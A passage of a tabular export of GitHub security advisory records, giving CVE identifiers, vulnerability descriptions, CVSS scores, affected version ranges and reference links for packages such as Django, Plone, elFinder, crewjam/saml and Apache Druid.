[{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.4.14'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-34801'}, {'type': 'WEB', 'url': 'https://github.com/xCss/Valine/issues/366'}, {'type': 'PACKAGE', 'url': 'https://github.com/xCss/Valine'}]","{'cwe_ids': ['CWE-94'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-06-17T18:44:36Z', 'nvd_published_at': '2021-06-16T15:15:00Z'}" +1.4.0,GHSA-4hq8-gmxx-h6w9,2023-02-07T21:30:32Z,2021-06-23T17:29:42Z,,['CVE-2020-27846'],XML Processing error in github.com/crewjam/saml,"### Impact + +There are three vulnerabilities in the go `encoding/xml` package that can allow an attacker to forge part of a signed XML document. For details on this vulnerability see [xml-roundtrip-validator](https://github.com/mattermost/xml-roundtrip-validator) + +### Patches + +In version 0.4.3, all XML input is validated prior to being parsed.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/crewjam/saml'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.4.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/crewjam/saml/security/advisories/GHSA-4hq8-gmxx-h6w9'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-27846'}, {'type': 'WEB', 'url': 'https://github.com/crewjam/saml/commit/da4f1a0612c0a8dd0452cf8b3c7a6518f6b4d053'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=1907670'}, {'type': 'PACKAGE', 'url': 'https://github.com/crewjam/saml'}, {'type': 'WEB', 'url': 'https://grafana.com/blog/2020/12/17/grafana-6.7.5-7.2.3-and-7.3.6-released-with-important-security-fix-for-grafana-enterprise/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3YUTKIRWT6TWU7DS6GF3EOANVQBFQZYI/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ICP3YRY2VUCNCF2VFUSK77ZMRIC77FEM/'}, {'type': 'WEB', 'url': 'https://mattermost.com/blog/coordinated-disclosure-go-xml-vulnerabilities/'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2021-0058'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210205-0002/'}]","{'cwe_ids': ['CWE-115', 'CWE-287'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-05-21T20:54:26Z', 'nvd_published_at': None}" +1.4.0,GHSA-378p-hrq3-x4p3,2021-05-28T18:49:50Z,2021-06-08T23:08:20Z,,['CVE-2021-33562'],Cross-site scripting in Shopizer,"A reflected cross-site scripting (XSS) vulnerability in Shopizer before 2.17.0 allows remote attackers to inject arbitrary web script or HTML via the ref parameter to a page about an arbitrary product, e.g., a product/insert-product-name-here.html/ref= URL.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.shopizer:shopizer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.17.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-33562'}, {'type': 'WEB', 'url': 'https://github.com/shopizer-ecommerce/shopizer/commit/197f8c78c8f673b957e41ca2c823afc654c19271'}, {'type': 'WEB', 'url': 'https://github.com/shopizer-ecommerce/shopizer/compare/2.16.0...2.17.0'}, {'type': 'WEB', 'url': 'https://www.exploit-db.com/exploits/49901'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-28T18:49:50Z', 'nvd_published_at': '2021-05-24T23:15:00Z'}" +1.4.0,GHSA-wph3-44rj-92pr,2022-08-11T00:02:01Z,2021-06-16T17:04:29Z,,['CVE-2021-32682'],elFinder before 2.1.59 contains multiple vulnerabilities leading to RCE,"### Impact + +We recently fixed several vulnerabilities affect elFinder 2.1.58. These vulnerabilities can allow an attacker to execute arbitrary code and commands on the server hosting the elFinder PHP connector, even with the minimal configuration. + +### Patches + +The issues were addressed in our last release, 2.1.59. + +### Workarounds + +If you can't update to 2.1.59, make sure your connector is not exposed without authentication. + +### Reference + +Further technical details will be disclosed on https://blog.sonarsource.com/tag/security after some time. + +### For more information + +If you have any questions or comments about this advisory, you can contact: + - The original reporters, by sending an email to vulnerability.research@sonarsource.com; + - The maintainers, by opening an issue on this repository.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'studio-42/elfinder'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.59'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/Studio-42/elFinder/security/advisories/GHSA-qm58-cvvm-c5qr'}, {'type': 'WEB', 'url': 'https://github.com/Studio-42/elFinder/security/advisories/GHSA-wph3-44rj-92pr'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32682'}, {'type': 'WEB', 'url': 'https://github.com/Studio-42/elFinder/commit/a106c350b7dfe666a81d6b576816db9fe0899b17'}, {'type': 'WEB', 'url': 'https://blog.sonarsource.com/elfinder-case-study-of-web-file-manager-vulnerabilities/'}, {'type': 'PACKAGE', 'url': 'https://github.com/Studio-42/elFinder'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/164173/elFinder-Archive-Command-Injection.html'}]","{'cwe_ids': ['CWE-22', 'CWE-78', 'CWE-918'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-06-15T21:01:45Z', 'nvd_published_at': '2021-06-14T17:15:00Z'}" +1.4.0,GHSA-82xf-8h9p-c6qj,2021-05-19T20:53:27Z,2021-06-22T15:23:45Z,,['CVE-2020-23264'],Cross-Site Request Forgery in forkcms,Cross-site request forgery (CSRF) in Fork-CMS before 5.8.2 allow remote attackers to hijack the authentication of logged administrators.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'forkcms/forkcms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.8.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-23264'}, {'type': 'WEB', 'url': 'https://github.com/forkcms/forkcms/pull/3123'}]","{'cwe_ids': ['CWE-352'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-19T20:53:27Z', 'nvd_published_at': '2021-05-06T22:15:00Z'}" +1.4.0,GHSA-9qq2-xhmc-h9qr,2022-04-25T20:20:41Z,2021-06-23T17:57:10Z,,['CVE-2018-20321'],Access Control Bypass,"An issue was discovered in Rancher 2 through 2.1.5. Any project member with access to the default namespace can mount the netes-default service account in a pod, and then use that pod to execute administrative privileged commands against the k8s cluster. This could be mitigated by isolating the default namespace in a separate project, where only cluster admins can be given permissions to access. As of 2018-12-20, this bug affected ALL clusters created or imported by Rancher.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/rancher/rancher'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.1.6'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2018-20321'}, {'type': 'WEB', 'url': 'https://github.com/rancher/rancher/commit/6ea187fcc2309d5a7a14ed47de5688bf6573f448'}, {'type': 'WEB', 'url': 'https://forums.rancher.com/c/announcements'}, {'type': 'PACKAGE', 'url': 'https://github.com/rancher/rancher'}, {'type': 'WEB', 'url': 'https://github.com/rancher/rancher/releases/tag/v2.1.6'}, {'type': 'WEB', 'url': 'https://rancher.com/blog/2019/2019-01-29-explaining-security-vulnerabilities-addressed-in-rancher-v2-1-6-and-v2-0-11/'}]","{'cwe_ids': ['CWE-288', 'CWE-668'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-12T18:10:58Z', 'nvd_published_at': '2019-04-10T14:29:00Z'}" +1.4.0,GHSA-v85c-hgq5-7pfw,2021-07-02T16:59:00Z,2021-06-29T18:26:05Z,,['CVE-2021-23399'],Arbitrary Command Injection,"This affects all versions of package wincred. If attacker-controlled user input is given to the getCredential function, it is possible for an attacker to execute arbitrary commands. This is due to use of the child_process exec function without input sanitization.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'wincred'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.0.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23399'}, {'type': 'WEB', 'url': 'https://github.com/rolangom/wincred/blob/3fd39186ee32add9c12046cdccf2765d19565335/index.ts%23L20'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-WINCRED-1078538'}]","{'cwe_ids': ['CWE-20'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-06-29T17:20:39Z', 'nvd_published_at': '2021-06-28T08:15:00Z'}" +1.4.0,GHSA-86r9-39j9-99wp,2021-05-20T16:54:50Z,2021-06-23T17:17:52Z,,['CVE-2016-9121'],Elliptic Curve Key Disclosure in go-jose,"go-jose before 1.0.4 suffers from an invalid curve attack for the ECDH-ES algorithm. When deriving a shared key using ECDH-ES for an encrypted message, go-jose neglected to check that the received public key on a message is on the same curve as the static private key of the receiver, thus making it vulnerable to an invalid curve attack.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'gopkg.in/square/go-jose.v1'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.4'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/square/go-jose'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2016-9121'}, {'type': 'WEB', 'url': 'https://github.com/square/go-jose/commit/c7581939a3656bb65e89d64da0a52364a33d2507'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/164590'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2020-0010'}, {'type': 'WEB', 'url': 'https://www.openwall.com/lists/oss-security/2016/11/03/1'}]","{'cwe_ids': ['CWE-326'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-05-20T16:54:50Z', 'nvd_published_at': None}" +1.4.0,GHSA-p99v-5w3c-jqq9,2023-09-05T13:14:51Z,2021-06-10T17:21:12Z,,['CVE-2021-33571'],"Django Access Control Bypass possibly leading to SSRF, RFI, and LFI attacks ","In Django 2.2 before 2.2.24, 3.x before 3.1.12, and 3.2 before 3.2.4, URLValidator, validate_ipv4_address, and validate_ipv46_address do not prohibit leading zero characters in octal literals. This may allow a bypass of access control that is based on IP addresses. (validate_ipv4_address and validate_ipv46_address are unaffected with Python 3.9.5+..) .","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'django'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.24'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'django'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.1.12'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'django'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.2.0'}, {'fixed': '3.2.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-33571'}, {'type': 'WEB', 'url': 'https://github.com/django/django/commit/203d4ab9ebcd72fc4d6eb7398e66ed9e474e118e'}, {'type': 'WEB', 'url': 'https://github.com/django/django/commit/9f75e2e562fa0c0482f3dde6fc7399a9070b4a3d'}, {'type': 'WEB', 'url': 'https://github.com/django/django/commit/f27c38ab5d90f68c9dd60cabef248a570c0be8fc'}, {'type': 'WEB', 'url': 'https://docs.djangoproject.com/en/3.2/releases/security/'}, {'type': 'PACKAGE', 'url': 'https://github.com/django/django'}, {'type': 'WEB', 'url': 'https://groups.google.com/g/django-announce/c/sPyjSKMi8Eo'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/B4SQG2EAF4WCI2SLRL6XRDJ3RPK3ZRDV/'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210727-0004/'}, {'type': 'WEB', 'url': 'https://www.djangoproject.com/weblog/2021/jun/02/security-releases/'}]","{'cwe_ids': ['CWE-918'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-06-10T14:42:30Z', 'nvd_published_at': '2021-06-08T18:15:00Z'}" +1.4.0,GHSA-xx8f-qf9f-5fgw,2023-09-11T15:00:57Z,2021-06-08T20:11:19Z,,['CVE-2021-3007'],Remote code execution in zendframework and laminas-http,"Laminas Project laminas-http before 2.14.2, and Zend Framework 3.0.0, has a deserialization vulnerability that can lead to remote code execution if the content is controllable, related to the __destruct method of the Zend\Http\Response\Stream class in Stream.php. NOTE: Zend Framework is no longer supported by the maintainer. NOTE: the laminas-http vendor considers this a ""vulnerability in the PHP language itself"" but has added certain type checking as a way to prevent exploitation in (unrecommended) use cases where attacker-supplied data can be deserialized.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'zendframework/zendframework'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '3.0.0'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'laminas/laminas-http'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.14.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3007'}, {'type': 'WEB', 'url': 'https://github.com/laminas/laminas-http/pull/48'}, {'type': 'WEB', 'url': 'https://github.com/Ling-Yizhou/zendframework3-/blob/main/zend%20framework3%20%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%20rce.md'}, {'type': 'WEB', 'url': 'https://github.com/laminas/laminas-http/commits/2.15.x/src/Response/Stream.php'}, {'type': 'WEB', 'url': 'https://github.com/laminas/laminas-http/releases/tag/2.14.2'}, {'type': 'WEB', 'url': 'https://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/'}]","{'cwe_ids': ['CWE-502'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-04-07T18:11:15Z', 'nvd_published_at': '2021-01-04T03:15:00Z'}" +1.4.0,GHSA-g39q-f4rm-85x4,2023-07-06T18:14:13Z,2021-06-08T20:10:37Z,,['CVE-2021-20682'],OS Command Injection in baserCMS,baserCMS versions prior to 4.4.5 allows a remote attacker with an administrative privilege to execute arbitrary OS commands via upload of malicious plugins.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'baserproject/basercms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.4.5'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-20682'}, {'type': 'WEB', 'url': 'https://basercms.net/security/JVN64869876'}, {'type': 'WEB', 'url': 'https://jvn.jp/en/jp/JVN64869876/index.html'}]","{'cwe_ids': ['CWE-78'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-29T22:37:23Z', 'nvd_published_at': '2021-03-26T09:15:00Z'}" +1.4.0,GHSA-5pr9-v234-jw36,2021-05-21T16:26:15Z,2021-06-18T18:44:01Z,,[],Remote Code Execution via traversal in TAL expressions,"### Impact +Most Python modules are not available for using in TAL expressions that you can add through-the-web, for example in Zope Page Templates. This restriction avoids file system access, for example via the 'os' module. But some of the untrusted modules are available indirectly through Python modules that are available for direct use. + +By default, you need to have the Manager role to add or edit Zope Page Templates through the web. Only sites that allow untrusted users to add/edit Zope Page Templates through the web are at risk. + +### Patches +The problem has been fixed in Zope 5.2 and 4.6. + +### Workarounds +A site administrator can restrict adding/editing Zope Page Templates through the web using the standard Zope user/role permission mechanisms. Untrusted users should not be assigned the Zope Manager role and adding/editing Zope Page Templates through the web should be restricted to trusted users only. + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in the [Zope issue tracker](https://github.com/zopefoundation/Zope/issues) +* Email us at [security@plone.org](mailto:security@plone.org) +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'Zope'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.6'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'Zope'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0'}, {'fixed': '5.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/zopefoundation/Zope/security/advisories/GHSA-5pr9-v234-jw36'}]","{'cwe_ids': ['CWE-22'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-21T16:26:15Z', 'nvd_published_at': None}" +1.4.0,GHSA-c99r-67x4-whj6,2021-10-05T17:29:12Z,2021-06-28T16:56:07Z,,['CVE-2021-33604'],"Reflected cross-site scripting in development mode handler in Vaadin 14, 15-19","URL encoding error in development mode handler in `com.vaadin:flow-server` versions 2.0.0 through 2.6.1 (Vaadin 14.0.0 through 14.6.1), 3.0.0 through 6.0.9 (Vaadin 15.0.0 through 19.0.8) allows local user to execute arbitrary JavaScript code by opening crafted URL in browser. + +- https://vaadin.com/security/cve-2021-33604","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:vaadin-bom'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '14.0.0'}, {'fixed': '14.6.2'}]}], 'database_specific': {'last_known_affected_version_range': '<= 14.6.1'}}, {'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:vaadin-bom'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '15.0.0'}, {'fixed': '19.0.9'}]}], 'database_specific': {'last_known_affected_version_range': '<= 19.0.8'}}]","[{'type': 'WEB', 'url': 'https://github.com/vaadin/platform/security/advisories/GHSA-c99r-67x4-whj6'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-33604'}, {'type': 'WEB', 'url': 'https://github.com/vaadin/flow/pull/11099'}, {'type': 'PACKAGE', 'url': 'https://github.com/vaadin/flow/'}, {'type': 'WEB', 'url': 'https://vaadin.com/security/cve-2021-33604'}]","{'cwe_ids': ['CWE-172'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-06-24T19:31:53Z', 'nvd_published_at': '2021-06-24T12:15:00Z'}" +1.4.0,GHSA-jj4f-p7vv-j4v9,2022-06-06T18:06:44Z,2021-06-16T17:51:58Z,,['CVE-2021-26919'],Arbitrary code execution in Apache Druid,"Apache Druid allows users to read data from other database systems using JDBC. This functionality is to allow trusted users with the proper permissions to set up lookups or submit ingestion tasks. The MySQL JDBC driver supports certain properties, which, if left unmitigated, can allow an attacker to execute arbitrary code from a hacker-controlled malicious MySQL server within Druid server processes. This issue was addressed in Apache Druid 0.20.2","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.druid:druid'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.20.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-26919'}, {'type': 'WEB', 'url': 'https://github.com/apache/druid/commit/48953e3508967f5156c69676432b5d4dd25ea678'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/druid'}, {'type': 'WEB', 'url': 'https://github.com/apache/druid/releases/tag/druid-0.20.2'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r443e2916c612fbd119839c0fc0729327d6031913a75081adac5b43ad@%3Cdev.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r470f8c92eb5df45f41b3ae609b6315b6c5ff51b3ceb2f09f00ca620f@%3Cdev.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r6bc68264170046448f823d12c17fd1fd875251d97d60869f58709872@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r7a531ec123570cb7875ff991cf115f99e9ef99a48b3cf3fa4f9d9864@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra85fa7d31f9bec1148ffd2e4030934927caa8bff89bca9f61f75e697@%3Cdev.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd87451fce34df54796e66321c40d743a68fb4553d72e7f6f0bc62ebd%40%3Cdev.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re0910cf4c784897774427fecd95912fb565a6bd06d924a55e70bbbfc@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re4c5deb0aae4bace69844d15c9fd1699e907ebfee93bc3926474d110@%3Cdev.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf3ea2a4018e87e6c45d36cf8479af7727dcc276edabd2f7cf59e0c5f@%3Cdev.druid.apache.org%3E'}]","{'cwe_ids': ['CWE-668'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-31T20:50:36Z', 'nvd_published_at': '2021-03-30T08:15:00Z'}" +1.4.0,GHSA-xrg9-wwrq-xmx9,2021-06-16T20:03:42Z,2021-06-16T17:11:30Z,,['CVE-2021-21661'],Missing Authorization,"Jenkins Kubernetes CLI Plugin 1.10.0 and earlier does not perform permission checks in several HTTP endpoints, allowing attackers with Overall/Read permission to enumerate credentials IDs of credentials stored in Jenkins.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:kubernetes-cli'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.10.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21661'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2021-06-10/#SECURITY-2370'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/06/10/14'}]","{'cwe_ids': ['CWE-862'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-06-14T19:17:11Z', 'nvd_published_at': '2021-06-10T15:15:00Z'}" +1.4.0,GHSA-p9cf-qjxq-vxw6,2021-06-17T20:04:36Z,2021-06-08T18:52:27Z,,['CVE-2020-1719'],Privilege Context Switching Error in wildlfy,A flaw was found in wildfly. The EJBContext principle is not popped back after invoking another EJB using a different Security Domain. The highest threat from this vulnerability is to data confidentiality and integrity. Versions before wildfly 20.0.0.Final are affected.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.wildfly.bom:wildfly'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '20.0.0.Final'}]}], 'database_specific': {'last_known_affected_version_range': '<= 19.1.0.Final'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-1719'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=1796617'}]","{'cwe_ids': ['CWE-270'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-06-08T17:28:03Z', 'nvd_published_at': '2021-06-07T17:15:00Z'}" +1.4.0,GHSA-35rg-466w-77h3,2021-05-27T21:54:47Z,2021-06-18T18:44:50Z,,['CVE-2021-33507'],"Cross-site scripting in Products.CMFCore, Products.PluggableAuthService, Plone","Zope Products.CMFCore before 2.5.1 and Products.PluggableAuthService before 2.6.2, as used in Plone through 5.2.4 and other products, allow Reflected XSS.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'Products.CMFCore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.5.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'Products.PluggableAuthService'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.6.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'Plone'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '5.2.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-33507'}, {'type': 'WEB', 'url': 'https://plone.org/security/hotfix/20210518/reflected-xss-in-various-spots'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/05/22/1'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-27T21:54:47Z', 'nvd_published_at': '2021-05-21T22:15:00Z'}" +1.4.0,GHSA-hm2h-f456-6j88,2021-05-27T22:10:55Z,2021-06-08T23:20:04Z,,['CVE-2021-33512'],Cross-site scripting in Plone,Plone through 5.2.4 allows stored XSS attacks (by a Contributor) by uploading an SVG or HTML document.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'Plone'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '5.2.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-33512'}, {'type': 'WEB', 'url': 'https://plone.org/security/hotfix/20210518/stored-xss-from-file-upload-svg-html'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/05/22/1'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-27T22:10:55Z', 'nvd_published_at': '2021-05-21T22:15:00Z'}" +1.4.0,GHSA-q7fr-vqhq-v5xr,2022-08-10T23:55:48Z,2021-06-16T17:39:05Z,,['CVE-2021-26118'],Apache ActiveMQ Artemis vulnerable to Improper Access Control,While investigating ARTEMIS-2964 it was found that the creation of advisory messages in the OpenWire protocol head of Apache ActiveMQ Artemis 2.15.0 bypassed policy based access control for the entire session. Production of advisory messages was not subject to access control in error.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.activemq:artemis-openwire-protocol'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.16.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-26118'}, {'type': 'WEB', 'url': 'https://github.com/apache/activemq-artemis/commit/e5566d52116d81611d914548adc3cbb14d7118d4'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/activemq-artemis'}, {'type': 'WEB', 'url': 